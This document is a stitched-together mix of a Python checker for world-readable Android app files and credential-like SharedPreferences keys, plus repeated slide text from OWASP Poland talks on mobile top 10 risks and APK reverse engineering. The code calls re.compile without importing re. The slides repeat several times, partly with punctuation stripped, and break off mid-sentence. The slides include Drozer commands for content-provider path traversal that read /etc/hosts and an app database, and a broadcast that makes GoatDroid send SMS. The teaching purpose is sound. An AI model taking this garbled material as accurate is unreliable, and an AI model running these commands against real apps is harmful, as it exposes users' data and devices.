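import xml.etree.ElementTree as ET


def world_accessible_files(ls_lines):
    """Regular files whose 'others' bits allow read or write, from `ls -l` output."""
    hits = []
    for line in ls_lines:
        fields = line.split()
        # mode, (link count,) owner, group, size, date, time, name
        if len(fields) < 5 or len(fields[0]) != 10:
            continue                      # "total N" lines, odd formats
        mode, name = fields[0], fields[-1]
        if mode[0] != "-":
            continue                      # directories, symlinks, sockets
        others = mode[7:10]
        if "r" in others or "w" in others:
            hits.append({"name": name, "mode": mode, "world_writable": "w" in others})
    return hits


# Key names that usually mean a credential or session material is stored as-is.
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|pwd|pin|token|secret|session|cookie", re.I)


def sensitive_prefs(xml_text):
    """Entries of a SharedPreferences <map> whose key names look like credentials."""
    root = ET.fromstring(xml_text)
    hits = []
    for item in root:
        name = item.get("name", "")
        if SENSITIVE_KEY.search(name):
            # <string> keeps its value as text, primitive types as a value attribute
            value = item.get("value") if item.get("value") is not None else (item.text or "")
            hits.append({"key": name, "type": item.tag, "value": value})
    return hits


# Constructed `adb shell ls -l` output for /data/data/<pkg>, flattened to one listing.
SAMPLE_LS = [
    "total 32",
    "drwxrwx--x 2 u0_a63 u0_a63  4096 2016-02-24 10:15 databases",
    "-rw-rw---- 1 u0_a63 u0_a63 20480 2016-02-24 10:15 databases/notes.db",
    "drwxrwx--x 2 u0_a63 u0_a63  4096 2016-02-24 10:15 shared_prefs",
    "-rw-rw-rw- 1 u0_a63 u0_a63   812 2016-02-24 10:15 shared_prefs/com.example.app_preferences.xml",
    "-rw-r--r-- 1 u0_a63 u0_a63   128 2016-02-24 10:15 cache/session.dat",
    "lrwxrwxrwx 1 root   root      11 2016-02-24 10:00 lib -> /data/app-lib/x",
]

# Constructed shared_prefs file (XML declaration omitted).
SAMPLE_PREFS = """\
<map>
    <string name="username">alice</string>
    <string name="password">hunter2</string>
    <string name="auth_token">eyJhbGciOiJIUzI1NiJ9.c29tZS1ib2R5.c2lnbmF0dXJl</string>
    <boolean name="remember_me" value="true" />
    <int name="launch_count" value="7" />
</map>
"""

if __name__ == "__main__":
    for f in world_accessible_files(SAMPLE_LS):
        print(f"{f['mode']} {f['name']}" + ("  (world-writable)" if f["world_writable"] else ""))
    for k in sensitive_prefs(SAMPLE_PREFS):
        print(f"prefs key {k['key']!r} ({k['type']}) stored in clear text")
```

Both checks are "before and after" tools: take the listing and the prefs files on a fresh install, exercise login and the sensitive features, then diff; a MODE_WORLD_READABLE preference file shows up as `-rw-rw-r--` or `-rw-rw-rw-` in the first check, and the second tells you which keys would need the SQLCipher or password-based-encryption treatment from the mitigations list.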
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– plain text configuration files
– cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:
    adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, „incorrectly”?
• Insecure implementations are:
– using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
– securing only part of the communication (e.g. only authentication)
– lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a „chain of trust”
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for the sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple-words definition: if you're able to bypass authentication and/or escalate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication („Remember Me”) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– another application, via an intent/content provider
– a shared file
– a server response
– a third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
Android's new toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, starting a new activity, etc.) via special objects called Intents:
    // implicit intent: open a URL in whatever app handles ACTION_VIEW
    Intent viewIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    // implicit intent: ask the camera app for a picture
    Intent captureIntent = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false”, another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– verify if the session expires (copy a cookie and try to use it after 30 minutes)
– verify if the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
– verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as the session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
Source: http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Using APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassemble and not decompile?
Decompiling
Diagram: DEX → JAR → Java
Decompiling – dex2jar
• dex2jar:
– converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– allows you to use any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten:
– closed-source Java decompiler
– combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool:
– open-source Java tool for reverse-engineering Android apps
– transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: decompiling with Luyten
Demo: modifying Smali files
Demo
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
